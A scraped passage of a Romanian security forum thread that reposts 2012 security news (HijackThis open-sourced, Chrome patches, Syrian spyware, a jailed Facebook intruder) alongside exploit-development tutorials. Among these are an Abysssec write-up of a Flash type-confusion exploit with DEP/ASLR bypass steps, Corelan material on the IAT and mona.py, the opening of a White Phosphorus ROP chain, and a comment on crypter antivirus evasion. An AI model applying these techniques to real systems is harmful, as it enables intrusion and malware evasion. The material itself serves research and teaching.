to the health of a PC providing needed data that helped experts clean machines from complicated malware infections. Enabling the open source community with source code for the powerful tool HijackThis shows the commitment Trend Micro has toward advancing security and privacy. The OSS framework provides people with an opportunity to help others in a rich and diverse environment, and this ensures that HijackThis will continue building on its strength in serving the community," said Paul Laudanski, Founder, Castlecops.com Trend Micro will continue to maintain the original source code and will update the base code on SourceForge as developers make modifications that are essential and positive to the continued improvement of this code. As new malicious code is released faster than ever before, the need for analyzing log data to identify new malicious code is more important than ever. Through this offer to the open source community, the product has the opportunity to develop and become an even better solution to quickly identify new malicious code. "HijackThis moving to open source is a really exciting stage for this tool and a big thanks to Trend Micro for bringing this tool back to life. HijackThis was once the most used tool for enumerating Windows startup programs and quickly identifying the presence of malware. Moving HijackThis to open source will prompt more rapid releases and also allow more people to be involved in the project so that it is able to keep pace with current infection techniques," said Larry Abrams, Owner and Founder of BleepingComputer.com. About Trend Micro Trend Micro Incorporated (TYO: 4704; TSE: 4704), a global cloud security leader, creates a world safe for exchanging digital information with its Internet content security and threat management solutions for businesses and consumers. A pioneer in server security with over 20 years' experience, we deliver top-ranked client, server and cloud-based security that fits our customers' and partners' needs, stops new threats faster, and protects data in physical, virtualized and cloud environments. Powered by the industry-leading Trend Micro Smart Protection Network cloud computing security infrastructure, our products and services stop threats where they emerge – from the Internet. They are supported by 1,000+ threat intelligence experts around the globe. Additional information about Trend Micro Incorporated and its products and services are available at Trend Micro.com. This Trend Micro news release and other announcements are available at http://NewsRoom.TrendMicro.com and as part of an RSS feed at www.trendmicro.com/rss. Or follow our news on Twitter at @TrendMicro. SOURCE Trend Micro Incorporated Sursa: Trend Micro Releases HijackThis Source Code to sourceforge.net - PR Newswire - sacbee.com

[h=1]Google Chrome update fixes high-severity vulnerabilities and patches Flash Player[/h]by Lucian Constantin, IDG News Service Feb 16, 2012 11:00 pm Google released a new version of its Chrome browser on Wednesday in order to update the bundled Flash Player plug-in and address serious security vulnerabilities. Google Chrome 17.0.963.56 fixes 12 security flaws, seven of which are considered high severity, four of medium severity and one of low severity. Security researcher Jüri Aedla received a special $1,337 reward for discovering and reporting an integer overflow vulnerability in libpng, the library used by Chrome to process PNG images. Other high-severity flaws were identified in the browser's PDF codecs, its subframe loading, h.264 parsing and path rendering components, as well as its MKV, database, column and counter node handling code. In theory these vulnerabilities should be considered critical because they could facilitate the remote execution of arbitrary code on the targeted systems. However, because Google Chrome has a sandboxed architecture, exploiting these vulnerabilities alone would not provide attackers with the necessary level of access to run malicious code. Six vulnerabilities patched in this release were discovered with the help of an open-source tool called AddressSanitizer, Google Chrome engineer Jason Kersey said in a blog post on Wednesday. Chrome 17.0.963.56 also includes a new Flash Player version that Adobe released on Wednesday, Kersey said. The Flash Player update addresses seven critical security flaws. Google paid a total of $6,837 to security researchers who reported vulnerabilities patched in this release. The company recently expanded its Chromium Security Rewards Program to also cover vulnerabilities found in Chrome OS. Sursa: Google Chrome update fixes high-severity vulnerabilities and patches Flash Player | Macworld

[h=3]Tales from the DNSCrypt: Linux Rising[/h]by David Ulevitch, Founder/CEO on Feb 16th, 2012 When we released the Mac-only preview of DNSCrypt, we knew it was a game changer. The revolutionary piece of lightweight software encrypts all DNS traffic between you and our servers. We also knew it was our responsibility to get this fundamental improvement to Internet security ready for the masses as quickly as possible. That’s why last week we announced that we’re searching for a rockstar win32 hacker to build a Windows release. But the blog post catalyzed a frenzy of responses from Linux users asking when a version would be available for them. The good news, is that the wait is over for Linux users. In fact, there was never a wait at all. We published the code for DNSCrypt on GitHub when we released the preview, so although there isn’t a user interface built just yet, Linux users can still experience the benefits of DNSCrypt in just a few steps. Here are simple step-by-step instructions for setting up DNSCrypt on your Linux machine: Download the right package for your Linux distribution: 64-bit DEB package (Debian, Ubuntu, other .deb-based distributions) 32-bit DEB package 64-bit RPM package (Openwall, CentOS, Fedora, other .rpm-based distributions) 32-bit RPM package [*]Install the package using your package manager [*]Open a terminal. Enter: sudo /usr/sbin/dnscrypt-proxy –daemonize [*]Set your DNS settings to 127.0.0.1. Confirm you’re using OpenDNS here. Now that you’re using DNSCrypt, you can spread the word to other Linux users. We’d love to see your blog posts, videos and social media posts so don’t forget to tag @OpenDNS on Facebook and Twitter. If you want to help build a GUI to make this process even easier for Linux users, we’d be happy to work with you to get it right. If you’d like us to review your work, email us at dnscrypt at opendns dot com. Additional instructions and compilation instructions for other operating systems can be found here. Sursa: https://blog.opendns.com/2012/02/16/tales-from-the-dnscrypt-linux-rising/

[h=1]Google cookies 'bypassed Safari privacy protection'[/h] 17 February 2012 Last updated at 18:28 GMT Google has been accused of bypassing the privacy settings of users of the Safari web-browser. The Wall Street Journal said Google and other companies had worked around privacy settings designed to restrict cookies. Cookies are small text files stored by browsers which can record information about online activity, and help some online services work. However Google says the story "mischaracterises" what happened. Advertisers can use cookies to track online behaviour, helping them to target the commercials they show to internet users. Some think this use of cookies erodes online privacy. In May, European Union laws are due to come into force which will restrict the use of advertising cookies. But cookies are also essential to some web services like those Google offers. Cookie control The Safari browser is produced by Apple, and is the browser used by the iPhone. By default Safari only allows cookies to be stored by the web page a user is visiting, not from third parties such as advertisers. However, Stanford University researcher Jonathan Mayer found that advertisers were still able to store cookies on the computers of internet users browsing with Safari. It was his discovery that formed the basis of the Wall Street Journal's story. Many Google services use cookies, for example to remember when someone is signed in to a service, but they are also used by the firm to help personalise advertising. It was when Google attempted to find a way to enable some of its services and personalised advertising to work on Safari that, Google says, it inadvertently stored cookies. Side-stepping Safari In a statement, senior vice president Rachel Whetstone said that last year the company had decided to "enable features for signed-in Google users on Safari who had opted to see personalised ads and other content". Continue reading the main story [h=2]“Start Quote[/h] We are aware that some third parties are circumventing Safari's privacy features and we are working to put a stop to it” Apple spokesman She added: "To enable these features, we created a temporary communication link between Safari browsers and Google's servers, so that we could ascertain whether Safari users were also signed into Google, and had opted for this type of personalisation." Ms Whetsone said the company had created new systems to make sure the information it collected was *********, but this had led to unintended consequences: "The Safari browser contained functionality that then enabled other Google advertising cookies to be set on the browser. "We didn't anticipate that this would happen, and we have now started removing these advertising cookies from Safari browsers. It's important to stress that, just as on other browsers, these advertising cookies do not collect personal information." The Wall Street Journal reported that Google "disabled the code after being contacted by the paper". Google declined to provide further comment to the BBC. Privacy warning Online privacy advocates were highly critical of Google's actions. The Electronic Frontier Foundation wrote: "It's time for Google to acknowledge that it can do a better job of respecting the privacy of web users." Although much of the criticism has been directed at the search giant, the Wall Street Journal said that in addition to Google, a number of advertising companies had been using the work-around which had been known about for some time. An Apple spokesman said in a statement: "We are aware that some third parties are circumventing Safari's privacy features and we are working to put a stop to it." Sursa: Google Cookies Bypassed Safari Privacy Protection ? Packet Storm

[h=1]Computer spyware is newest weapon in Syrian conflict[/h] [TABLE] [TR] [TD] [/TD] [TD] By Ben Brumfield, CNN February 17, 2012 [/TD] [/TR] [/TABLE] Syrians demonstrate against the regime after Friday prayers in the north Syrian city of Idlib on February 17. Activists working against the regime now have to worry about malware that can expose their activities (CNN) -- In Syria's cyberwar, the regime's supporters have deployed a new weapon against opposition activists -- computer viruses that spy on them, according to an IT specialist from a Syrian opposition group and a former international aid worker whose computer was infected. A U.S.-based antivirus software maker, which analyzed one of the viruses at CNN's request, said that it was recently written for a specific cyberespionage campaign and that it passes information it robs from computers to a server at a government-owned telecommunications company in Syria. Supporters of dictator Bashar al-Assad first steal the identities of opposition activists, then impersonate them in online chats, said software engineer Dlshad Othman. They gain the trust of other users, pass out Trojan horse viruses and encourage people to open them. Once on the victim's computer, the malware sends information out to third parties. Inside Syria: Hope, supplies run low in bunker Othman is an IT security "go-to-guy" for opposition activists. He resides outside of Syria for his own safety. Since December, he has heard from dozens of opposition members who say their computers were infected. Two of them recently passed actual viruses to Othman and a colleague with whom he works. They checked them out. "We have two malwares -- first one is really complex," Othman said via Skype chat. "It can hide itself more." The U.S. analysis of one of the viruses -- the simpler one -- would appear to corroborate the time of its launch around the start of the year. The virus has two parts, said Vikram Thakur, principal security response manager at Symantec Corporation, known to consumers for its Norton antivirus software. He said one of them points to December 6 and the other to January 16. Thakur has dubbed the simpler virus "backdoor.breut." It was the more complex virus that the former aid worker unwittingly downloaded during a chat. Since she travels to Syria, she has requested that CNN not name her for security reasons and instead refer to her as "Susan." In one Syrian town, full-throated cries of defiance To get a picture of the humanitarian needs on the ground in Syria, "Susan" contacted opposition members via the Internet. In January, she received a call via Skype from someone she believed was a regime opponent. It was an imposter and a regime supporter, she claims. "They called me actually and pretended that it's him -- this activist that I didn't know, because I'd been talking to him only two times and only in writing." Days later, other opposition members told Susan and Othman that the activist she thought she had spoken with was in detention. Activists accuse government forces of coercing him to reveal his user name and identity and of then going online to impersonate him. Othman says additional activists, who say they were detained and released, tell of being forced to turn over their passwords to Syrian authorities. CNN cannot independently confirm the accusations, because the Syrian government strictly limits international media coverage within its borders. Calls for Syrian government comment to a spokeswoman for al-Assad on Friday were not answered or did not go through. Friday is the weekly special day of prayer in the Muslim world. The man chatting with Susan via Skype passed her a file. She recalled what he said to her to coax her to open it: "This makes sure that when you're talking to me, it's really me talking to you and not somebody else." New York Times reporter dies in Syria She clicked on the file. "It actually didn't do anything," she said in a baffled tone. "I didn't notice any change at all." No graphics launched; no pop-up opened to announce to the user that the virus was being downloaded. The link appeared to be dead or defected, said Othman. The second virus, backdoor.breut, which was e-mailed to him by an activist inside Syria for analysis, launched the same way. "Download, open, then nothing," Othman said. It contains a fake Facebook logo and was passed off in a chat room as a Facebook security update, he said. At CNN's request, Othman forwarded that virus to an IT security expert in California for an independent analysis. Othman removed the more complex malware on Susan's computer but made an image of the infected hard drive beforehand. At more than 250 GB, it would have to be sent on an external hard drive by regular post -- snail mail -- for any independent scrutiny. The U.S. expert confirmed the invisible nature of the backdoor.breut Trojan horse download. Thousand stage public protests on Friday "Nothing would actually show up," said Thakur. "The only thing that the Trojan actually does -- it copies itself into one of the temporary locations, but that would not be visible to the regular user." The malware launches when the user reboots the computer. The Syrian cyberactivist and the California IT security manager pointed out that the lack of fanfare during download helps to conceal the viruses from their victims. "Most of them will say 'it's a damaged file,' and they will forget about it," Othman said. Susan did just that. She was not aware she had been hacked until she lost her Facebook and e-mail accounts a few days after clicking on the file. "I didn't click on any kind of new link or something, so they must have known about the password," she said, referring to the loss of her Facebook account. She handed over her laptop to Othman and his colleague, who told her that the Trojan horse had logged her key strokes, taken screen shots, rummaged through her folders. It hid the IP address it sent its information to, Othman said. Othman found a screen shot the Trojan horse took of Susan's online banking home page. He told her to change all her passwords, Susan said. "You don't want your money to be stolen by some of the Syrian security guys," she quipped. The other virus -- backdoor.breut -- sends the information it pillages from infected computers to the IP address: 216.6.0.28 and does not hide this. "We checked the IP address that our engineer referenced and can confirm that it belongs to the STE (Syrian Telecommunications Establishment)," a Symantec representative wrote to CNN. The STE is the government telecommunications company. This does not necessarily mean that someone at STE is doing the hacking, Thakur stresses. "Whether it's a home user behind that or it's actually a company or an organization, which has been allocated that IP address, we just have no insight from where we sit." But the Syrian government has access to all activity through that server "absolutely without any doubt," Thakur said. Anyone not wanting the government to see what they are up to would not use that server. Skilled Syrian opposition activists avoid government telecom servers when online. The simple virus, backdoor.breut, acts like a bull in a china shop, Symantec's Thakur said. "It did not look like it was written by any sophisticated hacker," he said after examining it. "It was just kind of put together -- slapstick functionality." Simple malware is readily available for download on underground forums in the Internet. Hackers can repurpose it and hand it out. Othman believed the second software to be such an off-the-shelf product because of its amateurish construction, but the California expert disagrees. "It's not something that somebody just went out there, copied code from an Internet website and just pasted it in. It was definitely coded for its current purpose." The name "backdoor.breut" derives from the virus' behavior. "We sort of took the word 'brute' just because of what it was actually doing and kind of changed a couple of characters to b-r-e-u-t," Thakur said. "Brute -- meaning that it is using brute force -- it's just going in smash-and-grab -- I'm going to try to get anything that I can and get the hell out of there." Backdoor.breut attempts to give the hacker remote control of the victim's computer, according to the analysis. It steals passwords and system information, downloads new programs, guides internal processes, logs keystrokes and takes shots with the webcam. It also turns off antivirus notification, but that does not completely conceal it from detection. "Some of the good software can detect it in the same day," Thakur said. The nature of its use may make backdoor.breut and other new Syrian malware hard to defend against. Antivirus makers need to know the virus to be able to assign it a signature and make the file detectible to block the download, according to Thakur. The more widely a new virus spreads around the world, the more likely it is to land on an antivirus maker's radar. The smaller the region the virus is located in, the less likely virus vigilantes are to notice and combat it. "Looking at this Trojan and the telemetry that we've gathered the last five or six days since we did the analysis, this is not targeting people across the complete globe. So, it could be days before some antiviruses actually create signatures for the file," Thakur said. More complex antivirus software can detect malware that does not yet have a signature, because of how it behaves after infecting the computer, Thakur said. If the antivirus does not have this 'behavior' component, it may not defend against a new virus "for a substantial amount of time." On a Facebook page named "Cyber Arabs," Othman warns activists of the danger of downloading the virus and reminds users to keep their antivirus software updated. Download.com, CNET's software download website, offers antivirus software, some of which includes a "behavior" component and is free of charge. But that is still no guarantee for not contracting a new Syrian cyberbug, "Susan" reminds. "It was up-to-date," she said. "The problem is that they sent me a ... file, and I was totally stupid -- like, it's an EXE file -- and I opened it." Sursa: Spyware Is Newest Weapon In Syrian Conflict ? Packet Storm

[h=1]York Facebook hacking student Glenn Mangham jailed[/h] 17 February 2012 Last updated at 19:44 GMT A software development student from York who hacked into Facebook has been jailed for eight months. Glenn Mangham, 26, had earlier admitted infiltrating the social networking website between April and May 2011. Mangham, of Cornlands Road, York, had shown search engine Yahoo how it could improve security and said he wanted to do the same for Facebook. Sentencing Mangham, Judge Alistair McCreath said his actions could have been "utterly disastrous" for Facebook. Alison Saunders, from the Crown Prosecution Service, described the case as "the most extensive and flagrant incidence of social media hacking to be brought before British courts". Prosecutor Sandip Patel rejected Mangham's claims, saying: "He acted with determination, undoubted ingenuity and it was sophisticated, it was calculating." Facebook spent $200,000 (£126,400) dealing with Mangham's crime, which triggered a "concerted, time-consuming and costly investigation" by the FBI and British law enforcement, Mr Patel said. Electronic footprint The prosecutor told Southwark Crown Court in London how Mangham had "unlawfully accessed and hacked into the social media website Facebook and its computers in April to May last year from his bedroom in Yorkshire". Mangham had ultimately stolen "invaluable" intellectual property, which he downloaded on to an external hard drive, said Mr Patel. Facebook discovered the infiltration during a system check even though the defendant deleted his electronic footprint to cover his tracks. Mr Mangham's defence lawyer Tom Ventham had said his client was an ethical hacker who had a "high moral stance" and Yahoo had "rewarded" him for pointing out its vulnerabilities previously. He added that when Mangham was arrested he made "copious" admissions to police about what he had done. Passing sentence, Judge Alistair McCreath told Mangham his actions were not harmless and had "real consequences and very serious potential consequences" for Facebook. 'Not harmless' "You and others who are tempted to act as you did really must understand how serious this is," he said. "The creation of that risk, the extent of that risk and the cost of putting it right mean at the end of it all I'm afraid a prison sentence is inevitable." Mr McCreath said while he acknowledged that Mangham had never intended to pass on any of the information he had gathered, nor did he intend to make any money from it, his activities were "not just a bit of harmless experimentation". "You accessed the very heart of the system of an international business of massive size, so this was not just fiddling about in the business records of some tiny business of no great importance," he said. A spokesperson for Facebook said they "applauded" the work of the police and Crown Prosecution Service in this case, "which did not involve any compromise of personal user data". They added: "We take any attempt to gain unauthorised access to our network very seriously, and we work closely with law enforcement authorities to ensure that offenders are brought to justice." Sursa: Gammarays Jailed For Hacking Facebook ? Packet Storm

Nu are legatura algoritmul de cryptare, antivirusii detecteaza incarcarea in memorie, sau in functie de alte aspecte unice ale executabilului (mai exact entrypoint-ul stubului, dimensiuni alea sectiunilor sau cine stie ce altceva). Eu pentru crypterul meu de 2 lei foloseam un algoritm stupid: se adauga 65 la fiecare byte. Daca are mai mult de 255, se scade 255. Ceva de genul, nici nu mai stiu exact, si functiona fara nicio problema, ca se modifica TOT in fisierul cryptat, dar nu se modifica NIMIC in stub.

Pirate Bay hits out at delusional recording industry The cartel must be stopped By Dave Neal Fri Feb 17 2012, 13:26 FILE SHARING WEB SITE The Pirate Bay has responded to criticisms from the Recording Industry Association of America (RIAA), painting the organisation as quite mad. The RIAA fired the first salvo in the war of words, as other battles are being waged online and in government, when it accused The Pirate Bay of being a dreadful copyright thief. The RIAA was commenting on the Pirate Bay's decision to upsticks and move to a Swedish .se web domain and accused it of being brazen, and "one of the worst of the worst". "A blatantly illegal file-sharing site, proud that it's an online bazaar of every conceivable U.S. copyrighted work, found criminally responsible by its own country's legal system and who has been ordered by courts in at least seven European countries to be blocked by ISPs, has publicly acknowledged changing its domain name to escape U.S. laws," wrote the RIAA in a blog post. "It is motivated by its brazen philosophy of thumbing its nose at the basic rights of America's creators. It is, in a phrase, one of the worst of the worst." A spokesman for The Pirate Bay has responded in a guest post at Torrentfreak. There a spokesman named "Winston" - with credit to George Orwell - said that this statement shows how detached and delusional the music industry has become. "The piece gives us ample information on just how delusional the recording industry really is, and shows why they must be stopped," said Winston in response to the post from Mitch Glazier, an impressively over-titled senior executive vice president at the RIAA. "In the very first sentence Glazier uses the phrase 'copyright theft'. It's an interesting concept - if anyone in history ever stole copyright, it must be the record industry... A small lesson to Mr Glazier: If someone steals something, you don't have it anymore. If you copy it, both have it. This means: If someone steals your copyright (aka 'copyright theft') you don't have the copyright anymore. I'm having a hard time to see that happening though, since copyright isn't really physical." Winston pokes fun at the RIAA, saying that it is out of date and relying on archaic arguments to shore up its cause. "Maybe (jobs lost to 'piracy') just aren't needed anymore! That's what technology does! Sorry, it's 2012 not 1912 - do you want to forbid robots as well, since they steal jobs?" he asks. Referring back to Glaziers comment about the web site being banned in a number of countries, and relating it to the recent European Court of Justice Sabam decision that outlawed monitoring and filtering content, he suggested that the RIAA might be supporting illegal activity. "And Mr. Glazier, talking about the countries in the EU that you have forced ISPs to block TPB (and other sites) is interesting, as the European Court has just decided that these types of censorship are just that - censorship, and should be treated as illegal," he added. "Could we see your view on the matter, as the RIAA is clearly supporting illegal censorship?" There is no love lost between the parties, of course, and while the RIAA suggests that it wants to work with the technology industry, The Pirate Bay will have nothing to do with it. "F*ck that. You're not in charge. If you want the help of the tech industry, ask for it. You'll probably get it since most tech people are nice. You're not in charge anymore and that's probably why you're pissed off," he said. "The recording industry is like a kid screaming for candy. The problem is that the kid has diabetes." µ

[h=2]Exploiting Adobe Flash Player on Windows 7[/h]Posted by shahin in advisory, Exploits / BUG Decryption, Fuzzing / Auditing, reversingello again . as a lot of readers like windows 7 exploits here is other one . [h=2]1) Advisory information[/h] [TABLE] [TR] [TD=width: 638] Title : Adobe Flash player Action script type confusion Version : flash10h.dll Discovery : Malware writers Exploit : Abysssec Information Security and Vulnerability Research Group Vendor : http://www.adobe.com Impact : Critical Contact : info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-3654 [/TD] [/TR] [/TABLE] [h=2]2) Vulnerable version[/h] [TABLE] [TR] [TD=width: 638]Adobe Flash Player 10.1.53 .64 prior versions[/TD] [/TR] [/TABLE] [h=2]3) Vulnerability information[/h] [TABLE] [TR] [TD=width: 638]Class 1- Type Confusion Impact Successfully exploiting this issue allows remote attackers to execute code under the context of targeted browser. Remotely Exploitable Yes Locally Exploitable Yes [/TD] [/TR] [/TABLE] [h=2]4) Vulnerability detail[/h] Here we have type confusion vulnerability in ActionScript bytecode language. The cause of these vulnerabilities is because of implementation of verification process in AS3 jit engine that because of some miscalculation in verifying datatype atoms, some data replaces another type of data and the confusion results in faulty machine code. Action script has the following structure. First our scripts are compiled using an action script compiler like flex to AS3 ByteCodes and embed it to DoABC, DoAction or DoInitAction tags in swf file format. When flash player opens the swf file, bytecodes are compiled to a jitted machine code through verification and generation process. Verification process is responsible for checking bytecodes to be valid instructions and it pass the valid bytecodes to generation process, thus generation process produces the machine code in memory. According to Dion Blazakis’s JIT Spray paper: To handle this runtime typing requirement, the ActionScript interpreter represents internal objects using tagged pointers – internal, this object is called an “atom”. Tagged pointers are a common implementation technique to differentiate between those objects stored by value and those stored by reference using the same word sized memory cell. A tagged pointer stores type information in the least significant bits and stores a type specific values in the most significant bits. As shown in Illustration 1, the ActionScript atom is 32 bits wide; it allocates 3 bits to store the type information and uses 29 bits for the value. So if it would be possible to confuse verifier too act an atom as another atom by some bytecode changes it would be possible to generate faulty code that most of the times lead to disclosing a vtable pointer call to the attacker. The bug is perfectly presented in Haifei li recent slides. We have OriginalClass and RefClass with the same functions. Func1 – OriginalClass return a class objects, but Func1 – RefClass returns another type. By changing a byte in the bytecode we have confused AS3 to execute RefClass functions in the main class. After that verifier confuses the return type of the function with an OriginalClass object and generate faulty code with the vtable under the control of the return value. Exploitation: For exploitation purpose on recent protections on windows 7 without any 3rd party, it is possible to use the same bug many times to leak the imageBase address and payload address. In our exploit we used three confusion to read String Objects address and accordingly imagebase address. Step1: read shellcode string object pointer by confusing it with uint and use it to leak ImageBase. Step2: leak address of the shellcode with the same pointer and NewNumber trick. Step3: send imageBase & shellcode address as parameters to the RopPayload function, develop Rop payload string and again confuse the return value with uint to read address of RopPayload string. Step4: send address of the rop payload as parameters to the last confused function that confuses string type with class object. And thus address of our rop payload will be used as vtable in the fake class object. Note: In using strings as a buffer for shellcode in action script, it is important to use alphanumeric characters because the toString method converts our ascii character set to uincode thus make our shellcode unusable. [h=2]5) Conclusion[/h] Finally we got the point that memory leakages are extremely useful in modern exploitation to bypass DEP, ASLR protections. It would be possible to find same atom confusion situation and other object leakage in adobe flash player. Kudos to haifei li for his great research, although it was not that simple to implement a reliable exploit with just slides without attending in talk. [h=2]6) Refrences[/h] http://www.cansecwest.com/csw11/Flash_ActionScript.ppt http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf [h=2]7) Exploit-Code[/h] Here you can get our reliable exploit against windows 7 : calc.exe payload Download : CVE-2010-3654_Win7 if you need other payloads for sure you know how to change it as always feedbacks are welcomed and you can follow @abysssec in twitter to getting updates . Happy Hunting ! Sursa: Exploiting Adobe Flash Player on Windows 7 | Abysssec Security Research

[h=2]Many roads to IAT[/h] Published December 1, 2011 | By Dinos [h=3]Introduction[/h] A few days ago a friend approached me and asked how he could see the import address table under immunity debugger and if this could be done using the command line. I figured this would be a good time to take a look at what the IAT is, how we can list the IAT and what common reversing hurdles could be with regards to the IAT. Let’s see first what is IAT and why it’s good to know what is in there. IAT stands for Import Address Table and according to wikipedia, “One section of note is the import address table (IAT), which is used as a lookup table when the application is calling a function in a different module. It can be in form of both import by ordinal and import by name. Because a compiled program cannot know the memory location of the libraries it depends upon, an indirect jump is required whenever an API call is made. As the dynamic linker loads modules and joins them together, it writes actual addresses into the IAT slots, so that they point to the memory locations of the corresponding library functions. Though this adds an extra jump over the cost of an intra-module call resulting in a performance penalty, it provides a key benefit: The number of memory pages that need to be copy-on-write changed by the loader is minimized, saving memory and disk I/O time. If the compiler knows ahead of time that a call will be inter-module (via a dllimport attribute) it can produce more optimized code that simply results in an indirect call opcode.” By knowing what’s inside IAT we can identify functions that are called from other modules in a program, look for possibly unwanted or strange behavior ( cases on virus / malware ) make the code under the debugger easier to read and find address location from functions of interest ( VirtualAlloc, HeapCreate, SetProcessDEPPolicy, NtSetInformationProcess, VirtualProtect, WriteProcessMemory ). In case you haven’t figured it out, you can use those functions to bypass DEP. Having an accurate pointer in the IAT to one of the functions will make it trivial to call the function in a ROP chain. [h=3]How can we query or list entries in the IAT ?[/h] [h=4]Windbg[/h] Windbg is many times the debugger of my choice, not because it’s the easiest to use, but mostly I got used to the interface and the fast response. Doing things under windbg in most cases will take far less time, if you know the way and far more time if you are trying to find your way now. After launching windbg, this is what you’ll get: You can start a debugging process under windbg by launching an application in the debugger (File – Open) or by attaching the debugger to a running application (File – Attach). For the purpose of this example we are going to use notepad.exe as test file, windbg will load the modules and it will stop just before the execution of the program waiting for command. All modules loaded at this moment can be viewed in the screen. As opposed to the other two debuggers, windbg lacks the easy drop down menu commands and identifying IAT requires a bit more time. First we need to locate the address of the Import Address Table in our executable, to do so the command !dh will be used: !dh command will Display the Headers of the requested module, (more for the commands at : http://windbg.info/doc/1-common-cmds.html) where we can identify the location, address of IAT. In my example IAT for notepad is located at memory address 1000 of the module notepad.exe. Dumping the content of the address we need to add the image base of our file plus the memory address of the IAT table, this can be done easily using two ways, either by using “dps notepad+1000 l1000/8 “ or by giving the image base address, “dps 00c10000+1000 l1000/8 “. dps command stands for display pointer-sized contents of memory in the given range. The output of the dps command will give us a lengthy result with the contents of the IAT table and the location of the functions. Another method again for windbg and a bit more elegant is described at OSR's windbg List: Import Table Functions, using the following windbg script, 1: r $t0 = poi(${$arg1}+poi(${$arg1}+0x3c)+0xd8) 2: r $t1 = poi(${$arg1}+poi(${$arg1}+0x3c)+0xdc) 3: dps ${$arg1}+$t0 l? (($t1+4)/4) saving the script under a name, eg: test1.txt in windbg directory and calling the script from windbg with $$>a< test1.txt notepad, we will have the following output on the debugger: 0:000> $$>a< test1.txt notepad 00121000 760e14d6 ADVAPI32!RegSetValueExWStub 00121004 760e46ad ADVAPI32!RegQueryValueExWStub 00121008 760e469d ADVAPI32!RegCloseKeyStub 0012100c 760e1514 ADVAPI32!RegCreateKeyW 00121010 760e468d ADVAPI32!RegOpenKeyExWStub 00121014 760e448e ADVAPI32!IsTextUnicode 00121018 760e369c ADVAPI32!CloseServiceHandleStub 0012101c 760db537 ADVAPI32!QueryServiceConfigWStub 00121020 760dca4c ADVAPI32!OpenServiceWStub 00121024 760dca64 ADVAPI32!OpenSCManagerWStub 00121028 00000000 0012102c 763d55de kernel32!FindNLSStringStub 00121030 763ba125 kernel32!GlobalAllocStub 00121034 763ba183 kernel32!GlobalUnlock 00121038 763ba235 kernel32!GlobalLock 0012103c 763bafc0 kernel32!GetTimeFormatW 00121040 763bb1a2 kernel32!GetDateFormatW 00121044 763baaef kernel32!GetLocalTimeStub 00121048 763b2b7b kernel32!GetUserDefaultUILanguageStub 0012104c 763bc3c0 kernel32!HeapFree 00121050 77a82dd6 ntdll!RtlAllocateHeap 00121054 763bfcdd kernel32!GetProcessHeapStub 00121058 763bbdad kernel32!GetFileInformationByHandleStub 0012105c 763bc452 kernel32!InterlockedExchangeStub 00121060 763b0368 kernel32!FreeLibraryAndExitThreadStub 00121064 763c4c14 kernel32!GetFileAttributesWStub 00121068 763ffd71 kernel32!Wow64RevertWow64FsRedirectionStub ... <snip> ... 001213e0 77a64168 ntdll!RtlInitUnicodeString 001213e4 77a760f8 ntdll!NtQueryLicenseValue 001213e8 77a504a5 ntdll!WinSqmAddToStream 001213ec 00000000 001213f0 74f91a15 VERSION!GetFileVersionInfoExW 001213f4 74f918e9 VERSION!GetFileVersionInfoSizeExW 001213f8 74f91b51 VERSION!VerQueryValueW 001213fc 00000000 00121400 90909090 Common commands for windbg, Common WinDBG Commands Reference - Willy's Cave - Site Home - MSDN Blogs Tutorial: https://www.corelan.be/index.php/2011/12/01/roads-iat/ vbulletin de cacat.

[h=2]mona.py – the manual[/h] Published July 14, 2011 | By Corelan Team (corelanc0d3r) [h=2]Introduction[/h] This document describes the various commands, functionality and behaviour of mona.py. Released on june 16, this pycommand for Immunity Debugger replaces pvefindaddr, solving performance issues, offering numerous improvements and introducing tons of new features. pvefindaddr will still be available for download until all of its functionality has been ported over to mona. [h=2]Downloading mona.py[/h] The mona project page is located here : mona - Overview - Corelan Team There are 2 versions of mona : A "stable" release and a trunk release. The stable release only gets updated once in a while (basically minor and major version updates), the trunk release is the one that has all the "bleeding edge" changes, patches, etc. "Stable" only refers to the fact that there are not a lot of changes (so no unexpected behaviour). It does not mean it is bugfree, it only means the bugs (if any) won’t get fixed until a next release. You can download the stable release here, but I recommend using the trunk release, which can be downloaded here. In fact, all documentation (including this one) is based on trunk releases, so if something is working differently in the stable release, we’ll ask you to start using the trunk release anyway. Together with the release of this documentation, we are also proud to be able to release mona.py v1.1 . The current stable version of mona.py is 1.1, the current trunk version of mona.py is dev-v1.2 Important : Mona only works on Immunity Debugger 1.8x and up. When you have downloaded mona.py, simply save the file into the PyCommands folder. In a typical installation, this folder is located here : C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands That’s it. mona.py is now installed. [h=2]Basic usage[/h] Open Immunity Debugger. At the bottom of the application you should see an input box (command bar) Enter !mona and press return. Open the log window (ALT-L) and you should get a full page of information about mona (options and commands) At the top, you can find the global options. The second half of the output contains all available commands. If you want more information about the use of a certain command, you can simply run !mona help <command>. Suppose you want more info about the use of the "assemble" command, run !mona help assemble output : ----------------------------------------------------------------------------------- Tutorial: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/

Da, dar asta e ceva mai profesional.

[h=2]Universal DEP/ASLR bypass with msvcr71.dll and mona.py[/h] Published July 3, 2011 | By Corelan Team (corelanc0d3r) [h=2]Introduction[/h] Over the last few weeks, there has been some commotion about a universal DEP/ASLR bypass routine using ROP gadgets from msvcr71.dll and the fact that it might have been copied into an exploit submitted to Metasploit as part of the Metasploit bounty. For the record, I don’t know exactly what happened nor have I seen the proof… so I’m not going to make any statements about this or judge anyone. Furthermore, this post is not about the incident, but about the routine itself (which looks pretty slick) and alternative routines. [h=2]The White Phosphorus version[/h] Released as part of the White Phosphorus Exploit Pack, the routine only uses gadgets and pointer to VirtualProtect from msvcr71.dll. That particular version of the dll does not rebase and is not ASLR enabled either, which makes it a perfect candidate for universal/generic DEP & ASLR bypass, providing that it contains all required gadgets to perform a generic ROP routine. If your target application has that particular version of the dll loaded (or if you can force it to load one way or another), you can use the ROP chain to bypass DEP and ASLR in a generic way. Immunity Inc published the bypass technique on their website. The routine looks like this : def wp_sayonaraASLRDEPBypass(size=1000): # White Phosphorus # Sayonara Universal ASLR + DEP bypass for Windows [2003/XP/Vista/7] # # This technique uses msvcr71.dll which has shipped unchanged # in the Java Runtime Environment since v1.6.0.0 released # December 2006. # # mail: support@whitephosphorus org # sales: http://www.immunityinc.com/products-whitephosphorus.shtml print "WP> Building Sayonara - Universal ASLR and DEP bypass" size += 4 # bytes to shellcode after pushad esp ptr depBypass = pack('<L', 0x7C344CC1) # pop eax;ret; depBypass += pack('<L', 